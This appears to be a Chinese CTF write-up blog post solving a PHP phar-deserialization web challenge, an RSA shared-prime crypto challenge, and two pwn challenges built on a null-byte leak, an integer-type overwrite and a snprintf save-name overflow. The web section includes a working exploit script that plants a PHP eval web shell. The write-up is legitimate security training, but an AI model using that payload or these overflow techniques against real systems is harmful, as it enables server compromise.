本文最后更新于 2024-02-12,文中内容可能已过时。
我这里放一下我做的两道pwn题,还有一道crypto,以及一道web
本次wp是在石墨文档上创作的(方便好用!),图片也是在那个上面,不知道图片链接后期会不会挂掉。
如果图片挂掉了可以在评论提醒我上传。
Web
easyphp
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<? php
error_reporting ( E_ALL );
$sandbox = './uploads/' ;
if ( ! is_dir ( $sandbox )) {
mkdir ( $sandbox );
}
include_once ( 'template.php' );
$template = array ( 'tp1' => 'tp1.tpl' , 'tp2' => 'tp2.tpl' , 'tp3' => 'tp3.tpl' );
if ( isset ( $_GET [ 'var' ]) && is_array ( $_GET [ 'var' ])) {
extract ( $_GET [ 'var' ], EXTR_OVERWRITE );
} else {
highlight_file ( __file__ );
die ();
}
if ( isset ( $_GET [ 'tp' ])) {
$tp = $_GET [ 'tp' ];
if ( array_key_exists ( $tp , $template ) === FALSE ) {
echo "No! You only have 3 template to reader" ;
die ();
}
$content = file_get_contents ( $template [ $tp ]);
$temp = new Template ( $content );
} else {
echo "Please choice one template to reader" ;
}
?>
template.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<? php
class Template {
public $content ;
public $pattern ;
public $suffix ;
public function __construct ( $content ){
$this -> content = $content ;
$this -> pattern = "/{{([a-z]+)}}/" ;
$this -> suffix = ".html" ;
}
public function __destruct () {
$this -> render ();
}
public function render () {
while ( True ) {
if ( preg_match ( $this -> pattern , $this -> content , $matches ) !== 1 )
break ;
global $ { $matches [ 1 ]};
if ( isset ( $ { $matches [ 1 ]})) {
$this -> content = preg_replace ( $this -> pattern , $ { $matches [ 1 ]}, $this -> content );
}
else {
break ;
}
}
if ( strlen ( $this -> suffix ) > 5 ) {
echo "error suffix" ;
die ();
}
$filename = __dir__ . './uploads/' . md5 ( $this -> content ) . $this -> suffix ;
file_put_contents ( $filename , $this -> content );
echo "Your html file is in " . $filename ;
}
}
?>
这里是利用index.php中的file_put_contents来读取到template.php中的内容,然后再利用template.php写出一个phar文件,最后利用phar文件的反序列化来执行写出shell。
exp.php
1
2
3
4
5
6
7
8
9
10
11
<? php
$phar = new Phar ( "C: \\ phar.phar" ); //后缀名必须为phar
$phar -> startBuffering ();
$phar -> setStub ( "<?php __HALT_COMPILER(); ?>" ); //设置stub
$o = new Template ( '<?php eval($_POST[a]);?>' );
$o -> suffix = ".php" ;
$phar -> setMetadata ( $o ); //将自定义的meta-data存入manifest
$phar -> addFromString ( "test.txt" , "test" ); //添加要压缩的文件
//签名自动计算
$phar -> stopBuffering ();
?>
在这之前要修改php.ini中的配置来打开允许phar写出文件。
然后我们把生成的phar.phar文件利用php://input上传,再用phar://文件位置
对文件进行引用,最后可以成功得到shell
有了shell之后直接对flag进行读取发现读取失败,最后使用蚁剑的终端,来运行目录下的readflag,成功得到flag文件。
看队里另外一个师傅的wp发现的学到的一些东西:
file_get_contents在使用phar伪协议时只能用相对于网站根目录的路径
?var[template][tp1]=phar://uploads/xxx/xxx.html&tp=tp1
总结:phar反序列化我还是第一次做,所以其实这道题就相当于是百度查出来的。学到了!
Crypto
asa
观察代码可以发现程序流程是:
生成了key和iv,并对flag进行加密 生成了p和q,并计算n,以65537为e,对key进行加密,输入了n和m 生成了q,并用上次的p,计算出n2,对iv进行加密,输出了n2和m2 发现p = gcd(n, n2)
分别计算出2中的q和3中的q
分别解密出key和iv
解密得到flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
p = gmpy2 . gcd ( 0x661d752110bcc6ee5ca33edaf244716cccce6400dfdbfd84ce6ae2d8fbbeb2f61584da7668768403b6135e7810eae9d4d8e044935f8680de5324c3fc0f9bffb01812f9d2ac9055ee8dbd17b90c5a60cb7595a82f24a075d951db3b7f913b8543ecd52b8c8464ce348c3970d511ae911e814f9ca33b8412db2730e61820f5de47 , 0x9f159326c907441326c88d17eae1c6e8aaea23922c5e628a585294e379e9245644f9c249c57f54a2b83921b4adc988fecc90c00feb6936d9be1f3a5ffae951b74ffbc6fc7aa11743e4ca179a937392dacf931e820d1d83016562ff608e8c59ef7310654a09bbba4a0129f71dcb61bd9bef073bbb93bfcac4a7a2e81156dbb32d )
print p
n1 = 0x661d752110bcc6ee5ca33edaf244716cccce6400dfdbfd84ce6ae2d8fbbeb2f61584da7668768403b6135e7810eae9d4d8e044935f8680de5324c3fc0f9bffb01812f9d2ac9055ee8dbd17b90c5a60cb7595a82f24a075d951db3b7f913b8543ecd52b8c8464ce348c3970d511ae911e814f9ca33b8412db2730e61820f5de47
n2 = 0x9f159326c907441326c88d17eae1c6e8aaea23922c5e628a585294e379e9245644f9c249c57f54a2b83921b4adc988fecc90c00feb6936d9be1f3a5ffae951b74ffbc6fc7aa11743e4ca179a937392dacf931e820d1d83016562ff608e8c59ef7310654a09bbba4a0129f71dcb61bd9bef073bbb93bfcac4a7a2e81156dbb32d
q1 = n1 // p
q2 = n2 // p
print q1
print q2
e = 65537
phi1 = ( p - 1 ) * ( q1 - 1 )
d1 = gmpy2 . invert ( e , phi1 )
c1 = 0xd7931796fa39cfa37c0b621c01175904206dff1d74a28369dcd6517957ed76c5eb7d4934cbeb902119f9215f9ae7926debe3abe856244b45dbb4caaa2b93dbb79a3ca1a9813e1466c49fe3c03e5462811afbf3f40ff79927f9fe3681b7f3cef34466b9a736512f4931b5026eefacbae9be6e408085a7a636c514574c3b22ffe
m1 = pow ( c1 , d1 , n1 )
print ( long_to_bytes ( m1 ))
phi2 = ( p - 1 ) * ( q2 - 1 )
d2 = gmpy2 . invert ( e , phi2 )
c2 = 0x6240740d41a539a88634726cf0a791a87e02419c3c3e00dff62eba59e81a93fd04a59109e57f64fc375b9a321583b6fa133317eb5c4e6eb1e6f6d9a0b4ae6ff0c54423718811f7956cd63b7bf9c7f8e29f48dad8f05b63b71d6c5112d91864adba0d6bb342c67aee39ccd5e2a6928a8e4ab2248d29a0c990bae821b31b39b1f3
m2 = pow ( c2 , d2 , n2 )
print ( long_to_bytes ( m2 ))
key = long_to_bytes ( m1 )
iv = long_to_bytes ( m2 )
c = AES . new ( key , AES . MODE_CBC , iv ) . decrypt ( "f8559d671b720cd336f2d8518ad6eac8c405585158dfde74ced376ba42d9fe984d519dc185030ddec7b4dc240fd90fa8" . decode ( "hex" ))
print c
Pwn
pi
第一部分
观察读入部分发现会在读入内容后写一个\x00,读入长度根据a2来计算。
但是在第一部分中,传入的长度是64,这导致了\x00溢出写到了s1中。
之后读入一个随机数,把随机数作为密码来检验输入的是否正常。
这里爆破是肯定不可以的,所以通过上面的溢出方法,可以发现\x00在随机数的部分被覆盖。
在接下来的%s位置则可以被输出。
输出后我们相当于获取了得到的随机数内容,也就是我们需要的密码。
到此登录部分已经完成
第二部分
第二部分使用了Monte Carlo Method 来获取随机数,并且对掉落在正方形内的随机数进行统计。最后得到pi的值,由于题目设置了计算时间,所以如果我们提供一个很大的随机次数N 是不显示的,故考虑其他方法达到高精度。
这里不难发现v1变量的类型是signed int,而读入的时候使用的是%llu,这就可以覆盖后面的内容。
我们构造v1 = 0,v2 = 3.1415926,并且用程序得到对应的unsigned long long数据用于输入,就可以成功得到flag。
这里填入的值为:4632251120704552960
bricktick_basic 缺少程序所必须的运行库,并且尝试安装也失败了,所以最终也无法动态调试。使用了静态分析的方法。
搜索字符串发现有一处cat flag
查看引用位置
逻辑部分相当的复杂。
这里根据字符串信息进行猜测,猜测这部分内容是在PAUSED阶段来操作的,也就是按下空格暂停时。
接下来有个逻辑判断
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
while ( v13 <= 66 && v14 <= 12 )
{
if ( v13 == 66 )
{
sub_55FDF8427634 ();
halfdelay ( 1 );
sub_55FDF8427363 ( "WIN!" );
sleep ( 3u );
if ( dword_55FDF842C1C0 )
system ( "/bin/cat flag" );
}
++ v14 ;
v4 = wgetch ( stdscr );
if ( v4 == 0x105 )
{
v13 /= 5 ;
}
else if ( v4 <= 0x105 )
{
switch ( v4 )
{
case 260 :
v13 *= 7 ;
break ;
case 259 :
v13 = 3 ;
break ;
case 258 :
v13 += 4 ;
break ;
case 27 :
endwin ();
exit ( 0 );
case 32 :
goto LABEL_102 ;
}
}
}
代码逻辑大概是根据输入的字符内容,对v13进行运算,当v13得到的结果为66的时候就会胜利。但是这里看到还对dword_55FDF842C1C0进行了一个判断,如果这个值为0,那么前面所操作的也是无用。可能也就这个地方,让一道RE题变成了一道pwn题吧。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#include <cstdio>
int dfs ( int x , int c )
{
if ( x > 66 ) return 0 ;
if ( x == 66 )
{
return 66 ;
printf ( "%d" , c );
}
if ( c == 0 ) return 0 ;
int ans ;
ans = dfs ( x + 4 , c - 1 );
if ( ans == 66 )
{
printf ( "下" );
return ans ;
}
ans = dfs ( 3 , c - 1 );
if ( ans == 66 )
{
printf ( "上" );
return ans ;
}
ans = dfs ( x * 7 , c - 1 );
if ( ans == 66 )
{
printf ( "左" );
return ans ;
}
ans = dfs ( x / 5 , c - 1 );
if ( ans == 66 )
{
printf ( "右" );
return ans ;
}
}
int main ()
{
dfs ( 0 , 11 );
return 0 ;
}
写了一个DFS进行搜索,当时赶时间,写的不好看勿喷。
输出的结果从右往左看(由于是DFS从内往外执行),就是需要输入的作弊码了。
其实这个算法程序还是比较容易的,这道题的难点在于我不知道那几个常量对应什么按键,百度了很久也不知道。
在我的印象中,代码按键应该都是小于127的吧,这里居然出现了几百的。
所以我百思不得其解,还好我看了一下前面的代码,发现了有这么一段内容也用了这两个代码按键。
代码内对sub_55FDF842560E进行调用
通过这一段内容就可以猜测
左键对应的是0x104,右键对应的是0x105
但是不知道上键和下键,那只能猜测一下了。
这里我们可以观察到循环退出条件是
1
while ( v13 <= 66 && v14 <= 12 )
我们又知道
上键和下键中一个是让v13 = 3的操作,另一个是让v13 + 3的操作。
所以我们这里连续对一个按键按3次,然后再按一个左键,如果暂停界面退出了,则说明那个键是+3的操作,否则就是=3的操作。
由此可以得到。
1
2
3
4
左 0x104 *7
右 0x105 /5
上 0x103 =3
下 0x102 +3
这里操作完之后,屏幕中会显示
但是没有出现我们想要的flag信息。这说明输出flag的判断语句
可能没有成立。
所以我们无法显示出flag的内容,我们查看该变量的引用
发现只有这一处引用,那我猜测这部分内容被上面的内容所覆盖。
也就是被所选内容覆盖。
查看哪里所上面的这个变量进行了复制,我们发现。
在保存存档的这个地方,对这个变量进行了操作。
而且用的是snprintf,%s
所以这里没有对长度进行判断,我们只需要构造一个长度大于0x100的存档名称,则可以覆盖到下面的内容。
所以我们覆盖后,再次输入作弊码,同时依靠我的手速进行截图,最终获得了flag。
wjh
